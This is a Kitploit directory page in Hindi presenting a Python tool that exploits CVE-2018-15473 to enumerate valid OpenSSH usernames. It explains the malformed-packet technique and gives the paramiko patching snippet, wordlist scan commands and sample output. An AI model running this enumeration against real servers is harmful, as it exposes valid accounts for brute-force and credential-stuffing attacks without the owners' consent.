Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Threaded-CVE-2018-15473 — क्लासिक CVE-2018-15473 OpenSSH उपयोगकर्ता गणना शोषण का Python 3 पुनः कार्यान्वयन, जिसे मल्टी-थ्रेडिंग, वर्डलिस्ट समर्थन, स्वचालित भेद्यता पहचान, और थ्रेड-सुरक्षित शोषण पैचिंग के साथ विस्तारित किया गया है। | Kitploit
उपकरण/GitHubGitHub/k3rn3l-32/threaded-cve-2018-15473
टोहीभेद्यता विश्लेषणशोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubk3rn3l-32/threaded-cve-2018-15473

Threaded-CVE-2018-15473

क्लासिक CVE-2018-15473 OpenSSH उपयोगकर्ता गणना शोषण का Python 3 पुनः कार्यान्वयन, जिसे मल्टी-थ्रेडिंग, वर्डलिस्ट समर्थन, स्वचालित भेद्यता पहचान, और थ्रेड-सुरक्षित शोषण पैचिंग के साथ विस्तारित किया गया है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
25 महीने पहलेअभी तक समीक्षित नहीं

CVE-2018-15473 — SSH उपयोगकर्ता नाम गणना उपकरण

क्लासिक CVE-2018-15473 OpenSSH उपयोगकर्ता गणना शोषण का एक Python 3 पुनः कार्यान्वयन, जिसे मल्टी-थ्रेडिंग, वर्डलिस्ट समर्थन, स्वचालित भेद्यता पहचान और थ्रेड-सुरक्षित शोषण पैचिंग के साथ विस्तारित किया गया है।


विषय सूची

  • भेद्यता के बारे में
  • शोषण कैसे काम करता है
  • विशेषताएँ
  • आवश्यकताएँ
  • स्थापना
  • उपयोग
  • उदाहरण
  • क्रेडिट और मूल अनुसंधान
  • अस्वीकरण

भेद्यता के बारे में

CVE-2018-15473 एक उपयोगकर्ता गणना भेद्यता है जो OpenSSH संस्करण 2.3 से 7.7 को प्रभावित करती है।

यह भेद्यता इस सूक्ष्म अंतर से उत्पन्न होती है कि OpenSSH सर्वर मान्य बनाम अमान्य उपयोगकर्ता नामों के लिए प्रमाणीकरण प्रयासों पर कैसे प्रतिक्रिया देता है। एक दोषपूर्ण सार्वजनिक-कुंजी प्रमाणीकरण पैकेट बनाकर, एक हमलावर सर्वर के व्यवहार का निरीक्षण कर सकता है और यह निर्धारित कर सकता है कि दिया गया उपयोगकर्ता नाम सिस्टम पर मौजूद है या नहीं — बिना उपयोगकर्ता का पासवर्ड जाने।

यह जानकारी लक्षित ब्रूट-फोर्स या क्रेडेंशियल-स्टफिंग हमले में एक महत्वपूर्ण पहला कदम हो सकती है।

विवरणमान
CVE आईडीCVE-2018-15473
प्रभावित संस्करणOpenSSH 2.3 – 7.7
CVSS स्कोर5.3 (मध्यम)
प्रकारसूचना प्रकटीकरण / उपयोगकर्ता गणना
प्रमाणीकरण आवश्यकनहीं

शोषण कैसे काम करता है

OpenSSH की प्रमाणीकरण प्रक्रिया सामान्यतः इस प्रकार काम करती है:

root@kitploit:~
Client → MSG_SERVICE_REQUEST  → Server
Client ← MSG_SERVICE_ACCEPT   ← Server
Client → MSG_USERAUTH_REQUEST → Server
Client ← MSG_USERAUTH_FAILURE or MSG_USERAUTH_SUCCESS ← Server

शोषण MSG_SERVICE_ACCEPT चरण का दुरुपयोग करता है। जब सर्वर MSG_SERVICE_ACCEPT वापस भेजता है, तो क्लाइंट को बाद के MSG_USERAUTH_REQUEST पैकेट में एक बूलियन फ़ील्ड जोड़ना होता है। paramiko के Message.add_boolean मेथड को नो-ऑप में पैच करके, उपकरण एक दोषपूर्ण/छोटा प्रमाणीकरण पैकेट भेजता है।

OpenSSH सर्वर तब उपयोगकर्ता नाम के अस्तित्व के आधार पर अलग व्यवहार करता है:

  • अमान्य उपयोगकर्ता नाम → सर्वर तुरंत MSG_USERAUTH_FAILURE के साथ अस्वीकार करता है (उपयोगकर्ता नाम मौजूद नहीं है, कुंजी जाँचने का कोई मतलब नहीं)
  • मान्य उपयोगकर्ता नाम → सर्वर AuthenticationException उठाता है (इसने कुंजी सत्यापित करने का प्रयास किया, जिससे उपयोगकर्ता के अस्तित्व की पुष्टि होती है)

यह उपकरण पैच किए गए paramiko हैंडलर (_parse_userauth_failure और _parse_service_accept) के माध्यम से उन दो प्रतिक्रियाओं को इंटरसेप्ट करता है और प्रत्येक उपयोगकर्ता नाम को तदनुसार वर्गीकृत करता है।

थ्रेड-सुरक्षा सुधार

मूल PoC add_boolean को स्थायी रूप से पैच करता है, जो एक साथ कई थ्रेड चलने पर रेस कंडीशन का कारण बनता है — थ्रेड एक-दूसरे के हैंडशेक में हस्तक्षेप करते हैं, जिससे झूठी SSH negotiation failed त्रुटियाँ उत्पन्न होती हैं। यह पुनः कार्यान्वयन पैच को threading.Lock() में लपेटता है, जिससे स्वैप एटॉमिक हो जाता है:

root@kitploit:~
with _patch_lock:
    real_add_boolean = paramiko.message.Message.add_boolean
    paramiko.message.Message.add_boolean = _add_boolean_noop
    try:
        result = original_service_accept(auth_handler, m)
    finally:
        paramiko.message.Message.add_boolean = real_add_boolean

विशेषताएँ

  • एकल उपयोगकर्ता नाम जाँच — त्वरित वन-शॉट मोड
  • वर्डलिस्ट मोड — उपयोगकर्ता नामों की पूरी सूची गणना
  • मल्टी-थ्रेडेड — कॉन्फ़िगर करने योग्य थ्रेड गणना, सभी थ्रेड-सुरक्षित
  • स्वचालित भेद्यता पहचान — स्कैनिंग से पहले लक्ष्य के कमजोर OpenSSH संस्करण चलाने की पुष्टि के लिए nmap का उपयोग करता है
  • डीडुप्लिकेशन — वर्डलिस्ट से डुप्लिकेट उपयोगकर्ता नाम स्वचालित रूप से हटाता है
  • स्वच्छ आउटपुट — सारांश रिपोर्ट के साथ रंग-कोडित परिणाम

आवश्यकताएँ

  • Python 3.8+
  • paramiko
  • python-nmap
  • nmap (सिस्टम बाइनरी, स्थापित होना चाहिए)

स्थापना

root@kitploit:~
git clone https://github.com/K3rn3l-32/Threaded-CVE-2018-15473.git
cd CVE-2018-15473

# Create and activate a virtual environment (recommended)
python3 -m venv venv
source venv/bin/activate

# Install dependencies
pip install paramiko python-nmap

सुनिश्चित करें कि आपके सिस्टम पर nmap स्थापित है:

root@kitploit:~
# Debian/Ubuntu/Kali
sudo apt install nmap

उपयोग

root@kitploit:~
usage: main.py [-h] [-p PORT] [-t THREADS] (-u USERNAME | -U WORDLIST) target

positional arguments:
  target                Target IP address

options:
  -h, --help            show this help message and exit
  -p, --port PORT       SSH port (default: 22)
  -t, --threads THREADS Threads for wordlist mode (default: 3)
  -u USERNAME           Single username to check
  -U WORDLIST           Path to wordlist file

उदाहरण

एकल उपयोगकर्ता नाम जांचें:

root@kitploit:~
python main.py 192.168.1.10 -u root

डिफ़ॉल्ट थ्रेड के साथ वर्डलिस्ट गणना:

root@kitploit:~
python main.py 192.168.1.10 -U /usr/share/wordlists/users.txt

कस्टम थ्रेड गणना और पोर्ट के साथ गणना:

root@kitploit:~
python main.py 192.168.1.10 -U users.txt -t 10 -p 2222

नमूना आउटपुट:

root@kitploit:~
[*] Scanning 192.168.56.109:22 ...
[*] Target running OpenSSH version: 4.7
[+] Target is VULNERABLE to CVE-2018-15473

[*] Loaded   : 12 usernames (0 duplicate(s) removed → 12 unique)
[*] Target   : 192.168.56.109:22
[*] Threads  : 10

  [+] root     <- VALID
  [+] service  <- VALID
  [-] guest
  [-] admin
  ...

─────────────────────────────────────────────
[*] Scan complete in 3.87s
[*] Checked  : 12 usernames
[*] Threads  : 10

[+] Valid    (2)  : ['root', 'service']
[-] Invalid  (8)
[!] Errors   (2)  : ['postgres', 'temp']

क्रेडिट और मूल अनुसंधान

यह उपकरण मूल प्रूफ-ऑफ-कॉन्सेप्ट शोषण का Python 3 पुनः कार्यान्वयन और विस्तार है। इस भेद्यता की खोज और दस्तावेजीकरण का पूरा श्रेय मूल शोधकर्ताओं को जाता है:

भूमिका

मूल शोषण: https://leapsecurity.io

यह पुनः कार्यान्वयन इन्हें जोड़ता है:

  • Python 3 संगतता (मूल Python 2 था)
  • थ्रेड-सुरक्षित शोषण पैचिंग (रेस कंडीशन फिक्स)
  • मल्टी-थ्रेडिंग के साथ वर्डलिस्ट मोड
  • स्वचालित nmap-आधारित भेद्यता पहचान
  • संरचित परिणाम रिपोर्टिंग

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पेनिट्रेशन टेस्टिंग के लिए है। इस उपकरण का उपयोग उन सिस्टमों के विरुद्ध करना जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है, अवैध और अनैतिक है। लेखक इस सॉफ्टवेयर के किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। हमेशा जिम्मेदार प्रकटीकरण का अभ्यास करें।

टूल डाउनलोड करें
नाम / हैंडल
मूल PoC लेखकLeap Security (@LeapSecurity)
भेद्यता अनुसंधानMatthew Daley
भेद्यता अनुसंधानJustin Gardner
भेद्यता अनुसंधानLee David Painter